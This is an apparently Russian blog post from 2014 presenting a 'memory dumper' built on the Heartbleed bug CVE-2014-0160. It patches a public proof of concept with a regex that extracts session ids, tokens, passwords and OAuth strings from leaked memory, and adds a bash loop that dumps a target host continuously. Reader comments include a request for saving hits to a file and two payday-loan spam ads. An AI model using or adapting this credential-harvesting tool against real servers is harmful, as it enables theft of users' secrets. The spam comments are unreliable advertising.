вторник, 8 апреля 2014 г.

Memory dumper based on CVE-2014-0160

You already know about this bug of course:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160

Just easy patch to original PoC: https://gist.github.com/ixs/10116537

 60 def hexdump(s):
 61   r = r"((sid|token|sess|pass|basic|oauth).*)"
 62   m = re.findall(r,s)
 63   print m
 64   sys.exit()
And some bash now:
~$ while true; do ./ssltest.py company.com >> regexped; done


We have plans to rewrite this PoC to use only one socket for multiple dumps.

3 комментария:

  1. как сделать чтоб сохранить в файл,если будет найдена хоть одна из строк?

    ОтветитьУдалить
  2. A borrower should crosscheck and look at the financing costs between different banks and consult for bring down rates of enthusiasm before tolerating the advance offer straight away.
    Cash Advance San-diego

    ОтветитьУдалить
  3. An immediate moneylender will deal with your credit through and through including subsidizing. The data you submit for coordinate moneylender payday advances won't be sold or given to other outsider loaning organizations.
    Cash Advance Chicago

    ОтветитьУдалить